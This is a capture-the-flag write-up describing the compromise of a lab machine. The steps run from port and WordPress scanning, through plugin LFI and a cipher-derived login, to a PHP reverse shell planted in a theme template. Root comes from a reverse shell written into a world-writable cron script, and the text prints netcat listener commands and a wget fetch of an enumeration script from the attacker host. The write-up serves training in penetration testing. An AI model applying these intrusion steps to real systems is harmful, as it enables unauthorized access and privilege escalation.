Nmap scan report for 10.10.20.32 Host is up (0.050s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.11.3.### | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e2:5c:33:22:76:5c:93:66:cd:96:9c:16:6a:b3:17:a4 (RSA) | 256 1b:6a:36:e1:8e:b4:96:5e:c6:ef:0d:91:37:58:59:b6 (ECDSA) |_ 256 fb:fa:db:ea:4e:ed:20:2b:91:18:9d:58:a0:6a:50:ec (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
As we can see, there are 3 ports open. 21 FTP, 22 SSH, and 80 HTTP. The -A in our scan gave us a title for the HTTP page. We can see it’s just an Apache2 default page. This means we should fire up gobuster to learn more about what may be lurking.
~ ftp 10.10.20.32 Connected to 10.10.20.32. 220 (vsFTPd 3.0.3) Name (10.10.20.32:m4iler): ftp 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. 226 Directory send OK. ftp> ls -hal 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 0 115 4096 Oct 06 11:57 . drwxr-xr-x 2 0 115 4096 Oct 06 11:57 .. 226 Directory send OK. ftp> cd .. 250 Directory successfully changed. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. 226 Directory send OK. ftp> ls -hal 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 0 115 4096 Oct 06 11:57 . drwxr-xr-x 2 0 115 4096 Oct 06 11:57 .. 226 Directory send OK.
That’s a bit disappointing, I thought the root.txt would be right in there. Welp, can’t be helped.
Wordpress
All righty! GoBuster shows us two different URLs: /wordpress and /hackathons. The Wordpress site seems like a good find, let’s run wpscan against it!
WordPress Security Scanner by the WPScan Team Version 3.8.11 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________
[+] URL: http://10.10.20.32/wordpress/ [10.10.20.32] [+] Started: Sun Feb 7 19:22:09 2021
Interesting Finding(s):
[+] XML-RPC seems to be enabled: http://10.10.20.32/wordpress/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] WordPress readme found: http://10.10.20.32/wordpress/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100%
[+] Upload directory has listing enabled: http://10.10.20.32/wordpress/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.20.32/wordpress/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01). | Found By: Atom Generator (Aggressive Detection) | - http://10.10.20.32/wordpress/index.php/feed/atom/, <generator uri="https://wordpress.org/" version="5.5.1">WordPress</generator> | Confirmed By: Style Etag (Aggressive Detection) | - http://10.10.20.32/wordpress/wp-admin/load-styles.php, Match: '5.5.1'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods) [+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] mail-masta | Location: http://10.10.20.32/wordpress/wp-content/plugins/mail-masta/ | Latest Version: 1.0 (up to date) | Last Updated: 2014-09-19T07:52:00.000Z | | Found By: Urls In Homepage (Passive Detection) | | Version: 1.0 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://10.10.20.32/wordpress/wp-content/plugins/mail-masta/readme.txt | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - http://10.10.20.32/wordpress/wp-content/plugins/mail-masta/readme.txt
[+] reflex-gallery | Location: http://10.10.20.32/wordpress/wp-content/plugins/reflex-gallery/ | Latest Version: 3.1.7 (up to date) | Last Updated: 2019-05-10T16:05:00.000Z | | Found By: Urls In Homepage (Passive Detection) | | Version: 3.1.7 (80% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://10.10.20.32/wordpress/wp-content/plugins/reflex-gallery/readme.txt
[!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Feb 7 19:22:13 2021 [+] Requests Done: 32 [+] Cached Requests: 26 [+] Data Sent: 8.812 KB [+] Data Received: 10.017 KB [+] Memory used: 161.727 MB [+] Elapsed time: 00:00:04
Mail Masta
Well that’s a lot of text to churn through. Let’s focus on Mail Masta first.
Looking at searchsploit, we have 2 exploits for mail masta, an LFI and a SQL injection.
1 2 3 4 5 6 7
------------------------------------------------------------ ---------------------- Exploit Title | Path ------------------------------------------------------------ ---------------------- WordPress Plugin Mail Masta 1.0 - Local File Inclusion | php/webapps/40290.txt WordPress Plugin Mail Masta 1.0 - SQL Injection | php/webapps/41438.txt ------------------------------------------------------------ ---------------------- Shellcodes: No Results
Okay, from the LFI exploit, we can read system data (but only data accessible to www-data, since that’s who we’re running the server as). This means I could read /etc/passwd, which gave me some information about the user elyana. The SQLi exploit gave us a table, but I couldn’t grab any data from it. Might come around to it later.
Reflex Gallery
Okay, since we got SOME info from Mail masta, let’s see if there’s any dirt on Reflex gallery. Running searchsploit again gives us some ideas:
Okay, from the WPscan output we know this exploit is for 3.1.3 and the current version running is 3.1.7. No dice (and yes, I’ve tried it in msfconsole before typing this out, suuuuure). Let’s look elsewhere.
The Vinegar hackathon
There was one more directory we haven’t seen so far: /hackathons. Well, it may be more help, eh?
Damn. There can’t just be this one sentence! If only there were something we could do to see if there is anything written on the site just to check if the box creator left us any clues!
In the source code of the website we find two lines. One with a jumble of text, the other with something that looks like a key.
The page says they hate vinegar. Well, I’m not fond of it either. Maybe it’s wordplay?
The Vigenére cipher
The Vigenére cipher remained unbroken for a total of 300 years. Now, we have the ciphertext and we’re not in the 18th century, so we should be able to crack it. The second line of the text can be tried as a deciphering key, and with that, we get a phrase saying Try #########. Tie that in with our username, and we have something we can put in a login box!
eloysa:##########
After putting this in, we get into the Wordpress admin panel!
(NOTE: You can read more about Vigenére ciphers here
Poppin’ shells
From Wordpress, we can do a lot. Blog about puppies and rainbows, let the world know of its impending doom… or just wreak havoc.
There are many ways to get where we want, but the one I chose was manually editing the 404.php template in the theme used. I simply replaced the theme’s 404.php with PentestMonkey’s reverse shell, edited the IP and port to match my netcat listener, and off to the races we go.
1 2 3 4 5 6 7 8 9
nc -lnvp 5050 listening on [any] 5050 ... connect to [10.11.3.###] from (UNKNOWN) [10.10.20.32] 34002 Linux elyana 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 19:28:10 up 1:26, 0 users, load average: 0.04, 0.03, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $
This is very good starting point. We can’t read eloysa’s user.txt file, not to speak of the root.txt, but we’ll get there. How? LinPEAS.
Privilege escalation
LinPEAS the helpful
Using LinPEAS is simple, yet very powerful. It basically runs several commands, enumerating each one and checking if it’s exploitable. All in a small script that can be easily transported via wget and some python magic.
On the attacker:
1 2 3 4 5
cd tools ls linpeas.sh php-reverse-shell.php python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
On the server to be recon’d:
1
wget 10.11.3.###:8000/linpeas.sh
Now that we have the LinPEAS script, just chmod +x it, and run with ./linpeas.sh
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist LEGEND: RED/YELLOW: 99% a PE vector RED: You must take a look at it LightCyan: Users with console Blue: Users without console & mounted devs Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) LightMangeta: Your username
====================================( Basic information )===================================== OS: Linux version 4.15.0-118-generic (buildd@lgw01-amd64-039) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data) Hostname: elyana Writable folder: /dev/shm [+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h) [+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . DONE ====================================( System Information )==================================== [+] Operative system [i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits Linux version 4.15.0-118-generic (buildd@lgw01-amd64-039) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 Distributor ID: Ubuntu Description: Ubuntu 18.04.5 LTS Release: 18.04 Codename: bionic
[+] Sudo version [i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version Sudo version 1.8.21p2 **[SNIBBEDY SNIB]** /etc/cron.weekly: total 20 drwxr-xr-x 2 root root 4096 Aug 6 2020 . drwxr-xr-x 98 root root 4096 Oct 9 08:38 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder -rwxr-xr-x 1 root root 723 Apr 7 2018 man-db -rwxr-xr-x 1 root root 211 Nov 12 2018 update-notifier-common
I had to snibbedy snib part of the output (it really gives you a LOT), but I left in the one thing we found. A cron job running every minute as root. Let’s see what it’s about!
Admins Anonymous
1 2 3 4 5 6 7 8 9
bash-4.4$ ls -hal /var/backups ls -hal /var/backups total 52K drwxr-xr-x 2 root root 4.0K Oct 7 13:41 . drwxr-xr-x 14 root root 4.0K Oct 5 19:43 .. -rw-r--r-- 1 root root 33K Oct 6 11:57 apt.extended_states.0 -rw-r--r-- 1 root root 3.5K Oct 5 21:07 apt.extended_states.1.gz -rwxrwxrwx 1 root root 79 Feb 7 19:46 script.sh bash-4.4$
Oh lawdy! 777 permissions on a file run by root? Don’t mind if I do!
What’s the actual content?
1 2 3 4 5
bash-4.4$ cat script.sh cat script.sh #!/bin/bash
#Just a test script, might use it later to for a cron task
Well diddly darn it, there is nothing important in the file at the moment. The note also says it’s going to be used later. As an undocumented administrator, it will be an honor to help my fellow admins.
Replacing the empty script with a simple reverse shell (courtesy of PayloadsAllTheThings, we can turn an innocuous piece of code into a root reverse shell, bypassing the eloysa user entirely.
Then, because the script runs every minute, we just have to start a netcat listener to capture our reverse shell.
1
nc -lnvp 4242
And, several seconds to a minute later, we get our shell back. W00T W00T!
1 2 3 4 5 6 7
nc -lnvp 4242 listening on [any] 4242 ... connect to [10.11.3.###] from (UNKNOWN) [10.10.20.32] 37722 /bin/sh: 0: can't access tty; job control turned off # id uid=0(root) gid=0(root) groups=0(root) #
Closing notes
This is labelled an easy box, said to have “multiple possible routes to root, both intentional and unintentional”. I have only found and documented one, but there may be more (seems to me that the FTP server should be another way in). However, the time being what it is (past my bedtime), I will not focus on all the routes in this writeup.
This box has shown me something that may be very useful to real-life pentests: The way may not be always straight ahead. The LFI exploit gave us a username, but no password. The /hackathons directory gave us a password, but no username. We went down several possible rabbit holes (not too deep ones, though), and needed to perform multiple recon passes in order to get something useful.
All in all, huge props to i7m4d for making this amazing box. I have to apologize for my attitude concerning this multi-route box, but it’s way too late for me to run through all of it again and again and again.
